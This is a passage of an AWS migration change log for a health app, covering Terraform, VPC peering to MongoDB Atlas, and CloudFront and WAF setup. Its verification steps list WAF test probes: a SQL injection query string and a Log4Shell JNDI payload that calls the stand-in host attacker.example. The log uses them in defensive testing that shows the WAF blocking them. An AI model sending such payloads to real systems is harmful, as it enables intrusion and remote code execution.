pcx-0cefe999865679045, routes in both prod private RTs, allowlist+10.20.0.0/16(0.0.0.0/0kept until Phase 10). - GitHub Actions
deploy-prod.yml—workflow_dispatchtrigger, OIDC federation, smokesorigin.askflorence.healthto bypass WAF-on-runner-IP false positives.
Cloudflare (manual adds by Taha): 10 DNS records total — 2 ACM validation CNAMEs, 6 SES verification records, 1 origin CNAME → ALB, 1 prod-canary CNAME → CloudFront.
MongoDB Atlas (prod project 69dc20c64005b222804dafa4): app-write password rotated (safe — Vercel's MONGODB_WRITE_URI was empty), 10.20.0.0/16 added to IP access list, peering connection established + routes.
Module changes:
infra/modules/cloudfront-waf/gained anextra_aliaseslist var (default[]— backward-compatible for staging) so one distribution can serve multiple hostnames.
How
Same Terraform modules as staging, called from infra/envs/prod/ with prod-scoped inputs. Four sequential terraform apply passes: (1) network + KMS (28 resources), (2) secrets + ACM (31 resources), (3) SES (6 resources), (4) compute + edge (24 resources). Peering adopted via terraform import + one follow-up apply to reconcile tags + auto_accept flag.
Rollback
- Canary out of traffic: delete the
prod-canary.askflorence.healthCNAME in Cloudflare. Distribution stays up but no one reaches it. - Scale ECS to 0:
aws ecs update-service --cluster askflorence-prod --service askflorence-prod-app --desired-count 0. Apex + www are still Vercel, so real users are unaffected. - Full teardown:
terraform destroyagainstinfra/envs/prod/after removingenable_deletion_protectionon the ALB. CloudFront distribution disables + deletes (~15 min). VPC + KMS + secrets destroy. Atlas peering stays active on Atlas side (needsatlas networking peering deleteto fully remove). - No Vercel rollback needed — no Vercel change was made.
Verification
All at https://prod-canary.askflorence.health (the non-advertised canary URL):
GET /api/health→ 200 with commit SHA + env=prodGET /api/counties?state={TX,NY}&zip=...→ 200, response body identical to Vercel prod on same inputPOST /api/waitlist→ 200 with realwaitlist_submission_id; Mongo write routed via peering (NAT never touched)GET /?id=1' OR '1'='1→ 403 via WAF SQLi rule- Response headers from CloudFront:
server: AskFlorence, HSTS (1 yr + preload), CSP, X-Frame-Options DENY,x-amz-cf-pop: LAX53-P6 - ECS: 2 tasks, rollout COMPLETED, task def
:4 - CloudWatch
aws-waf-logs-askflorence-prod-web-aclreceiving WAF logs - ECS app log group receiving request logs
Pre-existing bug flagged
MONGODB_WRITE_URI on Vercel prod is empty (since 2026-04-16 per the env-var modification timestamp). All writes from Vercel prod (consumer waitlist, agent discovery, unsubscribe) have been failing with "MONGODB_URI_WAITLIST_WRITE or MONGODB_URI_SURVEY_WRITE or MONGODB_WRITE_URI must be set" for ~6 days. Not caused by Phase 8, surfaced by Phase 8. Follow-up: Taha sets the new MONGODB_WRITE_URI on Vercel (the app-write URI this phase populated into prod/mongodb/app-write).
What this phase does NOT do
- Does not move any production DNS.
- Does not change any Vercel config.
- Does not retire anything (Resend, Vercel, Atlas
0.0.0.0/0entry). - Does not provision narrow-scoped prod Atlas writers (stays as a #56 follow-up).
- Does not request SES production access.
2026-04-22T22:30Z — Phase 7 staging Atlas VPC peering + M0 → M10 upgrade
Actor: taha.abbasi via SSO AdministratorAccess (staging 549136075525 + mgmt 778477254880); atlas CLI against staging project 69e31af12fd2c0aef51bbb41; agent: Claude Opus 4.7 Linked: Issue #47 Phase 7; session log.
Why
Staging's Mongo traffic egressed to Atlas over the public internet via the NAT gateway, with Atlas's IP access list scoped to the NAT EIP 54.164.140.5/32 + the operator's laptop IP. Works, but leaves a public network path open. Phase 7 replaces that path with an AWS VPC peering connection into Atlas's dedicated VPC, then tightens the Atlas allowlist to a single VPC-CIDR entry. Post-apply: every bit of Mongo traffic rides an Amazon private fabric end-to-end, and revoking the allowlist to VPC-only is the durable proof.
M0 doesn't support peering (shared tier, AWS account is Atlas's own), so the cluster was first upgraded to M10 dedicated — same region, same SRV hostname, same users, same URIs.
What shipped
Atlas (staging project 69e31af12fd2c0aef51bbb41):
- Cluster upgrade: M0 (TENANT) → M10 (AWS us-east-1, MongoDB 8.0.21, 10 GB disk). Upgrade took ~3 min on the API (UPDATING → IDLE), driven via
atlas clusters upgrade --tier M10 --diskSizeGB 10 --mdbVersion 8.0.connectionStrings.standardSrvpreserved asmongodb+srv://askflorence-staging.efsikmv.mongodb.net→ zero secret re-population. - Auto-provisioned network container on the project (Atlas allocates one AWS VPC per project+region on first M10): container
69e9356ea15f1b75005337a8, Atlas VPCvpc-0c1e118736ac1fb74in Atlas's account354811016174, CIDR192.168.248.0/21, regionUS_EAST_1. - Peering connection created via
atlas networking peering create aws: Atlas peering ID69e939017b7816840c17063c, resulting AWS peering IDpcx-05d74ae6d34a31a02. Status progressedINITIATING→AVAILABLEon Atlas andpending-acceptance→activeon AWS. - IP access list tightened from 2 entries (
54.164.140.5/32NAT EIP,136.38.212.186/32Taha laptop) → 1 entry (10.40.0.0/16staging VPC CIDR). Public path to Atlas is now closed; only traffic originating in our VPC can reach the cluster.
AWS staging (549136075525):
- VPC peering accepter —
aws_vpc_peering_connection_accepter.atlas_stagingresource in Terraform (imported from the out-of-band-created peering).AllowDnsResolutionFromRemoteVpc=trueon the accepter side so Atlas's split-horizon DNS returns private shard IPs when queried from within our VPC. - Routes added to both private route tables (
rtb-0b5a5b1da1f0a99c4,rtb-00fc1026859373d4f):192.168.248.0/21 → pcx-05d74ae6d34a31a02. Managed asaws_route.atlas_from_private_{a,b}Terraform resources. - Network module updated:
aws_route_table.privatenow haslifecycle { ignore_changes = [route] }, so externalaws_routeresources (peering, future transit gateway) don't conflict with the inline 0.0.0.0/0 → NAT default. Addedprivate_route_table_ids+public_route_table_idsmodule outputs. - ECS service force-new-deployment after peering activated so the running task picked up fresh DNS + TLS state (the pre-existing task's MongoClient had cached connections over the public path, which surfaced as 30s server-selection timeouts until the task was replaced).
No Vercel change. No app code change. No Mongo URI change. Everything in this phase is purely networking + tier.
Tricky bit worth preserving
After removing the NAT-EIP allowlist entry but before forcing a fresh ECS task, /api/waitlist returned HTTP 504 Gateway Timeout with ECS logs showing MongoServerSelectionError: Server selection timed out after 30000 ms. Briefly re-added the NAT EIP to keep the service serving while debugging. Diagnosis: the running task held DNS + connection state from before peering went live, so it was still trying to reach shards over the (now-blocked) public path. aws ecs update-service --force-new-deployment rotated the task; new task's fresh SRV lookup from within the peered VPC returned Atlas's private IPs, and the connection went green through peering. NAT EIP removed again cleanly. This is the canonical "peering-on-existing-cluster" gotcha — noting explicitly so Phase 8 prod peering runs force-new-deployment immediately after allowlist tightening, not 20 minutes later.
Rollback
- Immediate (app breaking): re-add
54.164.140.5/32to the Atlas allowlist viaatlas accessLists create 54.164.140.5 --type ipAddress --projectId 69e31af12fd2c0aef51bbb41. Public path returns within 30s. The peered path stays wired in parallel. - Full:
atlas networking peering delete 69e939017b7816840c17063c --projectId 69e31af12fd2c0aef51bbb41+ remove the peering-related routes +aws_vpc_peering_connection_accepterfrom Terraform. Atlas CIDR route drops; traffic falls back to NAT path. - Cluster downgrade M10 → M0: not supported by Atlas (one-way). To un-do the tier upgrade, destroy + recreate at M0 with a scrubbed data dump. Deliberate non-goal — M10 is where staging stays.
Verification
All from operator laptop over public internet (staging proxied through CloudFront from Phase 6):
GET https://stage.askflorence.health/api/health→HTTP 200.POST https://stage.askflorence.health/api/waitlist {...}→HTTP 200with real Mongowaitlist_submission_idwhile Atlas allowlist is scoped to10.40.0.0/16only (operator laptop IP NOT in allowlist, NAT EIP NOT in allowlist — the only reachable path from the ECS task to Atlas is the peering connection).GET https://stage.askflorence.health/api/counties?state=TX&zip=75001→HTTP 200with TX county data — proves the CMS proxy path (which egresses via NAT to the public internet) is unaffected by the Atlas peering change.atlas accessLists listreturns exactly one entry:10.40.0.0/16.aws ec2 describe-vpc-peering-connectionsshowspcx-05d74ae6d34a31a02statusactivewith accepterAllowDnsResolutionFromRemoteVpc=true.- Private RT routes confirmed: both private RTs have
192.168.248.0/21 → pcx-05d74ae6d34a31a02active. - Terraform plan clean after import + apply.
What this phase does NOT do
- No change to prod Atlas. Prod project is untouched. Phase 8 re-peers the existing M10 HIPAA prod cluster to the new prod VPC.
- No PrivateLink on staging. VPC peering is the chosen mechanism; PrivateLink is redundant on top and costlier.
- No cluster backup enabled on staging. M10 supports PITR but staging has no PHI and no production-traffic recovery requirement. Backup stays off; prod has PITR.
- No secret rotation. The
staging/mongodb/*Secrets Manager entries still hold the M0-era SRV URI, which is identical to the M10 SRV URI — no rotation required.
2026-04-22T05:30Z — Phase 6 staging front door: CloudFront + WAFv2 + security headers
Actor: taha.abbasi via SSO AdministratorAccess (staging 549136075525 + mgmt 778477254880); agent: Claude Opus 4.7 Linked: Issue #47 Phase 6; plan file ~/.claude/plans/hey-so-okay-that-delightful-eich.md.
Why
Phase 5 exposed the staging ECS service directly to the public internet via an ALB with just a TLS cert. Phase 6 puts a CloudFront distribution + WAFv2 web ACL in front of that ALB. Three goals:
- Edge protection. Every request now passes through WAFv2 with five AWS managed rule groups (Common, KnownBadInputs, SQLi, IpReputation, AnonymousIp) plus a rate-based rule (2000 req/5min/IP). SQLi probes and log4shell-style payloads are rejected at the edge before reaching ECS.
- Security headers + IP-opacity. CloudFront's response-headers policy appends HSTS, CSP, X-Frame-Options, Referrer-Policy, X-Content-Type-Options and overrides
Server→AskFlorence. Strips X-Powered-By + framework version headers. Brings the staging stack in line with the migration plan's "a competitor inspecting headers should not identify our stack" requirement. - Prod-stencil validation. Everything in this module is going to be re-applied verbatim in
askflorence-prodat Phase 8. Staging is where we iterated the Terraform, the origin pattern, and the CSP directive set — cheap mistakes now instead of expensive ones at cutover.
What shipped
New Terraform module infra/modules/cloudfront-waf/:
aws_wafv2_web_acl.this— CLOUDFRONT scope, default action Allow, 6 rules (priorities 0-100).aws_cloudwatch_log_group.waf— CMK-encrypted, 14-day retention on staging. Namedaws-waf-logs-*per AWS WAF's hard requirement.aws_cloudwatch_log_resource_policy.waf— authorizesdelivery.logs.amazonaws.comto write toaws-waf-logs-*in this account, constrained byaws:SourceAccount+aws:SourceArn.aws_wafv2_web_acl_logging_configuration.this— attaches the log group to the web ACL, redactsauthorization+cookieheaders.aws_cloudfront_response_headers_policy.this— security headers + header-strip (X-Powered-By, X-AspNet*-Version).aws_cloudfront_distribution.this— HTTPS-only origin, origin shield us-east-1, HTTP/2+HTTP/3, TLSv1.2_2021 minimum, two cache behaviors (default CachingDisabled for SSR,/_next/static/*CachingOptimized).
Staging wiring infra/envs/staging/cloudfront.tf:
- Module called with
alias = "stage.askflorence.health",origin_hostname = "origin.stage.askflorence.health". stage.askflorence.healthA-alias swung in place from ALB → CloudFront.- New
stage.askflorence.healthAAAA-alias added (CloudFront supports IPv6 natively). origin.stage.askflorence.healthA-alias added pointing at ALB. Covered by wildcard SAN on the existing ACM cert so CloudFront-to-ALB HTTPS handshake validates.
Resources created in the staging account (549136075525):
| Kind | Name / ID |
|---|---|
| CloudFront distribution | EJQQLYE9IE4U9 (dk0jmb66fh49u.cloudfront.net) |
| WAFv2 web ACL | askflorence-staging-web-acl (arn:...webacl/askflorence-staging-web-acl/4d7e1072-04b4-466b-b67a-5ce03036757d) |
| Response-headers policy | askflorence-staging-response-headers |
| CloudWatch log group | aws-waf-logs-askflorence-staging-web-acl (14d retention, staging CMK) |
| Route 53 A/AAAA | stage.askflorence.health → CloudFront |
| Route 53 A | origin.stage.askflorence.health → ALB |
How
AWS_PROFILE=askflorence-staging terraform apply(backend viaTerraformBackendRolein mgmt from Phase 3 pattern).- Single apply; the existing
aws_route53_record.stage_aliasTerraform address was moved fromalb.tf→cloudfront.tfwith a retargeted alias, producing one in-place Route 53 update and zero DNS gap. - First CloudFront distribution create took ~3 min (fast for CloudFront — sometimes it's 15+).
- One apply-time surprise: the CloudFront API rejects
Viaas a removable header even though the documented valid-values list includes it. The module comments note this;Viaisn't in the strip list. CloudFront adds its ownViaheader identifying the CDN (not the origin), which is acceptable given TLS ALPN + cert SANs already reveal we're behind CloudFront.
Rollback
- DNS rollback (5 min):
terraform applya prior commit to revertstage.askflorence.healthalias back to the ALB. CloudFront distribution stays up, just unreferenced. - Distribution disable:
aws cloudfront update-distributionwithEnabled=false— serves a 403 to viewers until re-enabled or DNS rolls back. - Full destroy:
terraform destroyon themodule.cloudfront_stagingtargets. Note CloudFront takes ~15 min to destroy even when disabled (AWS's unavoidable propagation step). - No Vercel prod impact from any rollback scenario — this phase only touches the staging account.
Verification
GET https://stage.askflorence.health/api/health→HTTP 200, viaLAX54-P10CloudFront edge, response headers include:server: AskFlorence,strict-transport-security: max-age=31536000; includeSubDomains; preload,x-frame-options: DENY,referrer-policy: strict-origin-when-cross-origin,x-content-type-options: nosniff, full CSP directive.- SQLi probe
GET /?id=1%27%20OR%20%271%27=%271→ HTTP 403 (AWSManagedRulesSQLiRuleSet block). - Log4shell probe
User-Agent: ${jndi:ldap://attacker.example/a}→ HTTP 403 (KnownBadInputsRuleSet block). - Normal
GET /→HTTP 200. X-Powered-Byabsent from response (confirmed viacurl -I).- Origin cert validation: CloudFront → ALB via
origin.stage.askflorence.healthhandshakes clean (covered by*.stage.askflorence.healthwildcard on the existing ACM cert). - Vercel regression: none possible — this phase never touched Vercel.
What this phase does NOT do
- CloudFront access logs are not enabled. Audit evidence is covered by WAF logs + org CloudTrail + ALB access logs (already on). Standard access logs can be added in a follow-up if needed.
- Real-time logging to Kinesis Data Streams not wired. WAF logs go to CloudWatch directly, which is simpler and meets the evidence requirement.
- Lambda@Edge not used. Header scrubbing beyond what
RemoveHeadersConfigallows (specificallyVia) would require Lambda@Edge — not in scope for v1. - Prod account unchanged. Phase 8 mirror will take this module and call it in
infra/envs/prod/with a prod-scoped alias + cert.
2026-04-21T09:30Z — Phase 5 staging go-live: ECR + ECS + ALB + SES path + PostHog opt-out
Actor: taha.abbasi via SSO AdministratorAccess (staging 549136075525 + mgmt 778477254880); agent: Claude Opus 4.7 Linked: Issue #47 Phases 5.1–5.7; Issue #56 staging-side waitlist user; session log 2026-04-21-phase-5-staging-go-live.md; commits e24c5ca, 44c1493, 90d05af, 04cfd35.
Why
Phases 1–4 built the AWS scaffolding (accounts, org baseline, Terraform, networking, KMS, secrets, ACM, SES identity, Route 53 subzone). Phase 5 is when the Next.js app actually starts running on it. Goal: the exact same build that Vercel serves today should be reachable on stage.askflorence.health via AWS ECS with no feature regressions, and every outbound integration (Atlas, CMS API, SES, PostHog) should work through the staging network path without weakening security posture. Vercel prod continues to serve askflorence.health unchanged through the entire phase.
What shipped
AWS (staging account 549136075525):
- New ECR repository
askflorence-app(immutable tag policy, scan-on-push, KMS-encrypted). - New ECS cluster
askflorence-stagingwith Fargate + FARGATE_SPOT capacity providers; Container Insights on. - New ECS task definition family
askflorence-staging-app-task—0.25 vCPU / 0.5 GB, non-root UID 1001, port 3000, awslogs driver to/aws/ecs/askflorence-staging-app(14-day retention, CMK-encrypted). - New ECS service
askflorence-staging-app(desired 1, min 100 / max 200 for rollover; circuit breaker on). - New ALB
askflorence-staging-albin the 2 public subnets. HTTPS listener with thestage.askflorence.healthACM cert from Phase 4; HTTP redirects to HTTPS. Target groupaskflorence-staging-tghealth-checksGET /api/healthon port 3000. - Route 53
stage.askflorence.healthA-alias record → staging ALB. - Task execution role permissions for
secretsmanager:GetSecretValue+kms:Decrypton each staging secret ARN and the staging CMK. Task role permissions forses:SendEmail/ses:SendRawEmail. - Task role SES policy widened mid-session from
identity/stage.askflorence.healthtoidentity/*(still account-scoped). SES authorizes on every identity referenced in a send (From + To/CC/BCC), and sandbox requires the recipient identity also be verified in-account; the narrower scope was rejecting sends to the verified[email protected]sandbox recipient. Tighter scoping will return post-cutover once the account is out of sandbox and recipient-identity verification is no longer relevant. staging/mongodb/waitlist-writeSecrets Manager secret populated with a real URI (was the placeholder string since Phase 4). New secret versione2d9dc25-a1f4-4235-a065-8acf67433892.
Atlas (staging project 69e31af12fd2c0aef51bbb41):
- New custom role
role_writer_waitlist— 7 actions (FIND,INSERT,UPDATE,REMOVE,CREATE_INDEX,DROP_INDEX,COLL_MOD) scoped toaskflorence.agent_waitlist_submissions. - New DB user
app_writer_waitlist(password-auth, 32-char alphanumeric, never echoed; temp-file handoff into Secrets Manager +.env.staging.local). - Prod project untouched.
App code (commits on main, pushed to staging branch for GH Actions deploy):
e24c5ca—src/lib/email.tsprovider abstraction;/api/waitlist+/api/agents/discoveryrefactored tosendEmail();@aws-sdk/client-sesv2 ^3.1033.0added.44c1493—EMAIL_FROM_DOMAINoverride insidesendEmail();infra/envs/staging/ecs.tfsets it tostage.askflorence.health.90d05af— task role SES policy widened toidentity/*.04cfd35—src/lib/posthog-server.tsfail-open + staging no-op;instrumentation-client.tshost-based opt-out via extendedsyncNoTrackMode; Dockerfile + workflow wiring forNEXT_PUBLIC_POSTHOG_PROJECT_TOKEN+NEXT_PUBLIC_POSTHOG_HOST; ECS task def env plumbed.
GitHub Actions:
- Repo variables
NEXT_PUBLIC_POSTHOG_PROJECT_TOKEN+NEXT_PUBLIC_POSTHOG_HOSTset (public values, variables not secrets). deploy-staging.ymlbuild step passes both as--build-args todocker buildx build.
How
Same cross-account Terraform pattern from Phase 3: local env AWS_PROFILE=askflorence-staging; backend block in versions.tf assumes TerraformBackendRole in mgmt for state I/O. ECS module sets lifecycle { ignore_changes = [container_definitions] } on the task definition so CI/CD owns env-var + image updates — this session registered revisions :3–:8 out-of-band via aws ecs register-task-definition when env needed to change between GH Actions deploys. All AWS writes were via the staging SSO AdministratorAccess permission set or the GH Actions OIDC role from Phase 3.
Rollback
- App-level:
git revertany of the 4 commits and push tostaging; GH Actions redeploys the prior image. All commits are additive + feature-flagged. - Task-def env changes: register a prior revision and
update-service --task-definition <prior-arn>. Prior revisions retained per ECS defaults. - IAM widening: re-narrow the
SesSendinline policy toidentity/stage.askflorence.health; SES sends will start failing to sandbox recipients again but sends from the staging domain keep working. - Atlas user:
atlas dbusers delete app_writer_waitlist --projectId 69e31af12fd2c0aef51bbb41; secret reverts to the pre-session PLACEHOLDER value. - No Vercel rollback needed — no Vercel change made.
Verification
All on stage.askflorence.health:
GET /api/healthreturns{"status":"ok","commit":"04cfd35...","env":"staging"}.POST /api/waitlistreturns200with realwaitlist_submission_id; Mongo row present;AWS/SES/Sendmetric+1.- CloudWatch logs
/aws/ecs/askflorence-staging-app: zero errors post-deploy. - Client bundle
/_next/static/chunks/0u92fl5tvujj9.jscontains both the expected PostHog token and the literalstage.askflorence.health(baked at build time, staging opt-out behavior present). - Vercel regression:
npm run buildgreen withEMAIL_PROVIDERunset; Resend send path unchanged.
2026-04-21T04:30Z — Phase 3a: Terraform scaffolding + GitHub Actions OIDC federation
Actor: taha.abbasi via SSO AdministratorAccess (mgmt + each member) Linked: Issue #47, plan file ~/.claude/plans/hey-so-okay-that-delightful-eich.md Phase 3
Why
Phase 1–2.5 resources were provisioned by AWS CLI. Phase 3 introduces Terraform as the management layer for everything going forward. Phase 3a scope is minimal and non-destructive: state backend + per-account directory structure + OIDC federation so GitHub Actions can deploy without long-lived IAM keys. No existing Phase 1/2/2.5 resources are touched — they'll be terraform imported in Phase 3b (optional, later).
What shipped
State backend (management account 778477254880):
- New S3 bucket
askflorence-tfstate-778477254880— versioning, SSE-KMS withalias/askflorence-dataCMK, public access blocked, deny-non-SSL, org-wide read/write onenv/<env>/*prefix viaaws:PrincipalOrgIDcondition. - New DynamoDB table
askflorence-tfstate-locks(PAY_PER_REQUEST, SSE-KMS) with resource policy allowing org principals toGet/Put/DeleteItem+DescribeTable. - KMS CMK
alias/askflorence-datapolicy extended: org principals canGenerateDataKey/Decrypt/DescribeKeywhen ViaService matchess3.us-east-1.amazonaws.com. - New IAM role
TerraformBackendRole(mgmt): trust scoped toaws:PrincipalOrgID == o-vefew8kgv1, inline policy grants tfstate bucket + DynamoDB + KMS access. Each env's backend config assumes this role for state operations — this is the canonical pattern because Terraform S3 backend doesn't cross-account cleanly without it.
Terraform directory structure (repo root infra/):
infra/README.md— layout + operations docinfra/_shared/versions.tf+tags.tf— reference files; the backend blocks live per-env because backend config can't be templated with variablesinfra/envs/management/— mgmt account root (state keyenv/management/terraform.tfstate)infra/envs/prod/— prod account root (state keyenv/prod/terraform.tfstate)infra/envs/staging/— staging account root (state keyenv/staging/terraform.tfstate)infra/envs/log-archive/— log-archive account root (state keyenv/log-archive/terraform.tfstate)infra/modules/— empty (populated in Phase 4+ with network, ecs-service, cloudfront-waf, secrets, alb, ecr, monitoring)infra/envs/management/outputs-reference.md— lists resources pending tf-import in Phase 3b
GitHub Actions OIDC federation (per account):
aws_iam_openid_connect_provider.github_actionswith GitHub's pinned thumbprints in each of 4 accounts.aws_iam_role.github_actions_deploy(GitHubActionsDeployRole) in each account, trust scoped to:- mgmt: main branch + staging branch + production environment + staging environment + PRs
- prod: main branch + production environment only (staging branch cannot assume)
- staging: staging branch + staging environment + PRs
- log-archive: main branch + staging branch + PRs (state-only operations, no workload permissions)
- Inline policies least-privilege: state read/write on own env prefix; prod/staging add scaffold ECR/ECS/CW Logs permissions (tightened to specific ARNs in Phase 5 when the cluster + repo exist); log-archive is state-only.
Versions
- Terraform
1.14.9(installed via direct HashiCorp download — the Homebrew binary on Taha's machine was x86_64 under Rosetta, which slowed provider plugin startup enough to time out; arm64 native at~/.local/bin/terraform) - AWS provider
~> 6.0(locked to6.41.0in.terraform.lock.hclper env) tlsprovider~> 4.0
Verification
terraform planon all 4 envs returns clean (exit code 0, "no changes").- All 4
GitHubActionsDeployRoleARNs present + assumable. TerraformBackendRoleassumable from SSO sessions in all 4 profiles (direct verification viasts assume-role).- State files present in
s3://askflorence-tfstate-778477254880/env/{management,prod,staging,log-archive}/terraform.tfstate— versioned, KMS-encrypted.
SOC 2 / HIPAA / EDE relevance
- SOC 2 CC6.1 (Logical Access) + CC8.1 (Change Management): IaC is now the documented path for AWS changes. Every future resource change appears as a tracked PR with diff review + test plan.
- SOC 2 CC6.7 (transmission restrictions): tfstate bucket denies non-SSL, SSE-KMS encryption at rest.
- Credential hygiene: zero long-lived IAM access keys for CI/CD. GitHub Actions uses OIDC + short-lived STS tokens only. Matches the Drata-readiness requirement from the migration plan.
Phase 3b (deferred, next session)
terraform import pass to bring existing Phase 1/2/2.5 resources into state. Full list in infra/envs/management/outputs-reference.md. Prioritized by impact: SCPs, SSO permission sets, budgets, CloudTrail, KMS keys, log buckets first; Drata stubs + IAM user policy details last.
2026-04-21T07:00Z — Phase 4 refactor: Route 53 subzone delegation + DNS-strategy decision
Actor: taha.abbasi via SSO AdministratorAccess in staging account 549136075525 (Terraform backend assumes TerraformBackendRole in mgmt) Linked: Issue #47
DNS architecture decision — apex-on-Cloudflare + engineering subzone in Route 53
Per Taha 2026-04-21, matching his prior AWS pattern:
askflorence.healthapex stays on Cloudflare permanently. G Suite MX, Google Search Console verification TXT, other site verifications, and (at Phase 10) the CNAME to the prod CloudFront distribution. The consumer-facing app at apex continues to be served via Cloudflare DNS (DNS-only, no proxy) pointing to CloudFront via Cloudflare's CNAME-flattening feature.stage.askflorence.healthis a delegated Route 53 subzone in the staging AWS account. Every engineering DNS record under this subzone is Terraform-managed.- Phase 8 prod pattern (future):
prod.askflorence.health→ Route 53 in prod account for admin/internal/API endpoints. User-facingaskflorence.healthapex stays Cloudflare-authoritative.
Net effect: one-time 4 NS records at Cloudflare for staging (and later prod) instead of manually adding every individual AWS-side DNS record. Cloudflare remains the identity-verification + marketing DNS owner forever.
What shipped
Consolidation: SES staging identity migrated from staging.askflorence.health to stage.askflorence.health. One subdomain for both web (ACM + ALB + CloudFront) and email (SES DKIM + MAIL FROM + DMARC). Simpler DNS story, one subzone delegation, matches Taha's intent.
Terraform changes:
- New
infra/envs/staging/dns.tfwithaws_route53_zone.stagingforstage.askflorence.health. modules/acm/extended withmanage_dns_in_route53bool +route53_zone_id. When true, auto-creates validation CNAMEs and waits for issuance. When false, records still exposed via outputs for Cloudflare-manual addition (prod apex cert path if we ever need it).modules/ses/extended with the same boolean + zone ID pattern. When true, auto-creates DKIM CNAMEs + MAIL FROM MX/SPF + DMARC TXT in Route 53.- Used boolean (
manage_dns_in_route53) rather thanroute53_zone_id != ""check becausecountandfor_eachcan't evaluate on values that are "known after apply" (the freshly-created zone's ID was unknown at initial plan time). - Two-pass apply:
terraform apply -target=aws_route53_zone.stagingfirst to create the zone, then the full plan picked up the records.
Destroyed: previous staging.askflorence.health SES identity + mail_from_attributes (never had DNS backing, zero impact to remove).
Created: Route 53 zone stage.askflorence.health (Z06011002V7IQH7MBL1JY), new SES identity for stage.askflorence.health, 3 DKIM CNAME records, 1 MAIL FROM MX + 1 MAIL FROM SPF TXT, 1 DMARC TXT, 2 ACM validation CNAMEs (both SANs share the same validation record — allow_overwrite = true handles dedup), 1 aws_acm_certificate_validation wait resource.
Updated Taha next action
Add 4 NS records at Cloudflare (DNS-only, no proxy) delegating stage.askflorence.health to the 4 AWS nameservers listed in phase-4-staging-dns-records.md. Once propagated (~1-5 min), ACM auto-validates + SES auto-verifies. Zero other manual DNS work for the remainder of Phase 4-7 staging build.
Vercel prod impact
Zero. All changes isolated to staging AWS account + a future Cloudflare NS add.
2026-04-21T06:00Z — Phase 4: staging networking + KMS + Secrets Manager + ACM + SES
Actor: taha.abbasi via SSO AdministratorAccess in staging account 549136075525 (Terraform backend assumes TerraformBackendRole in mgmt for state) Linked: Issue #47, plan file Phase 4 scope
What shipped
55 resources created in staging account via Terraform (infra/envs/staging/):
Networking (module: infra/modules/network):
- VPC
10.40.0.0/16with DNS hostnames + resolution enabled (vpc-0b074e33f5599c587) - 4 subnets across us-east-1a + us-east-1b: public
10.40.0.0/24+10.40.1.0/24, private10.40.10.0/24+10.40.11.0/24 - Internet Gateway + single NAT Gateway in us-east-1a (cost-optimized for staging; prod uses
nat_ha=truefor per-AZ NAT) - Route tables: 1 public (→ IGW), 2 private (→ single NAT via route), + all associations
- VPC endpoints: S3 Gateway (free), and interface endpoints in us-east-1a only (single AZ cost optimization):
kms,secretsmanager,bedrock-runtime(Bedrock Runtime endpoint is forward-looking per plan's Phase 3 migration readiness — unused today) - Security group
askflorence-staging-vpc-endpointsallowing HTTPS from VPC CIDR - VPC Flow Logs → CloudWatch Log Group
/aws/vpc/askflorence-staging/flow-logswith 7-day retention + IAM role for delivery
KMS (module: infra/modules/kms):
- CMK
alias/askflorence-staging(ARN ending...da11a033...3ec7e) with annual rotation + 30-day deletion window - Key policy: staging root IAM full access, Secrets Manager service (GenerateDataKey/Decrypt/DescribeKey), CloudWatch Logs service (Encrypt*/Decrypt*/ReEncrypt*/GenerateDataKey*/Describe*)
Secrets Manager shells (module: infra/modules/secrets):
- 13 secrets under
staging/*namespace, all encrypted with the staging CMK, all tagged withDataClass:mongodb/app-read(phi),mongodb/survey-write(phi),mongodb/plans-write(pii),mongodb/agents-write(phi),mongodb/agents-admin(phi),mongodb/audit-read(phi),mongodb/waitlist-write(pii)cms-api-key(cms_hub),posthog-key(pii),unsubscribe-token-secret(pii)anthropic-api-key(phi),bedrock-runtime-role-arn(phi),openai-whisper-api-key(phi) — Florence workstream reservations
- Each secret has a placeholder version (
PLACEHOLDER-REPLACE-ME-OUT-OF-BAND) withlifecycle.ignore_changeson value — Terraform manages shell + tags, values populated out-of-band via CLI when actually needed - 30-day recovery window on deletion
ACM cert (module: infra/modules/acm):
- Certificate for
stage.askflorence.health+ SAN*.stage.askflorence.health - ARN:
arn:aws:acm:us-east-1:549136075525:certificate/3023432f-d564-4a3c-8db5-e4a7423c9c2f - Status: PENDING_VALIDATION (requires one CNAME at Cloudflare — see phase-4-staging-dns-records.md)
SES identity (module: infra/modules/ses):
- Domain identity
staging.askflorence.health - MAIL FROM subdomain
mail.staging.askflorence.health - 3 DKIM tokens generated (RSA 2048-bit), 3 CNAMEs required at Cloudflare
- Status: PENDING (requires 3 DKIM CNAMEs + MAIL FROM MX + SPF TXT + DMARC TXT at Cloudflare)
- DMARC policy:
p=none(monitor only — prod will tighten toquarantineorreject)
Module library at infra/modules/
This Phase created the reusable Terraform module library that Phase 8 (prod mirror) will consume:
network/— VPC + subnets + IGW + NAT (configurable HA) + route tables + SG + S3 Gateway endpoint + configurable interface endpoints (single or multi-AZ) + flow logskms/— CMK + alias + rotation, extensible policysecrets/— Secrets Manager shells with lifecycle.ignore_changes on value (value lives out-of-band)acm/— Cert with DNS validation + output for Cloudflare recordsses/— Email identity + MAIL FROM + DKIM + DMARC output for Cloudflare records
Phase 8 prod config will call the same modules with different inputs (e.g., nat_ha=true, interface_endpoint_multi_az=true, vpc_cidr="10.20.0.0/16", DMARC p=quarantine).
Vercel prod impact
Zero. All 55 resources live exclusively in the AWS staging account (549136075525). No Vercel env changes, no app code changes, no MongoDB changes. Vercel prod continues serving askflorence.health exactly as before.
Compliance implications
- SOC 2 CC6.1 (Logical Access) + CC7.1 (Infrastructure Management): staging is now a separate network + IAM + encryption boundary from prod, managed via IaC.
- SOC 2 CC6.7 (transmission): TLS-only policies already in place (tfstate bucket + KMS default + forthcoming ALB); staging workloads inherit.
- HIPAA §164.312(a)(2)(iv) (encryption at rest): staging CMK rotation enabled; all Secrets Manager secrets SSE-KMS-encrypted with the CMK.
- HIPAA §164.312(e)(2)(ii) (transmission encryption): SES identity + DMARC/SPF/DKIM setup ensures authenticated email delivery; transmission to SES is TLS-inherent.
- EDE Phase 3 / NIST 800-53 AU family: VPC Flow Logs capturing all traffic, retained 7 days in staging (prod will retain longer); CloudTrail already org-wide from Phase 2.
- Data classification enforcement: every Secrets Manager shell tagged with
DataClassper the plan's architectural principle. Future IAM policies can useaws:ResourceTag/DataClassconditions to grant access based on classification.
Taha next action (parallel / unblocks Phase 5)
Add 7 DNS records to Cloudflare DNS (DNS-only, no proxy) per phase-4-staging-dns-records.md:
- 1 CNAME for ACM cert validation
- 3 CNAMEs for SES DKIM
- 1 MX + 1 TXT for SES MAIL FROM subdomain
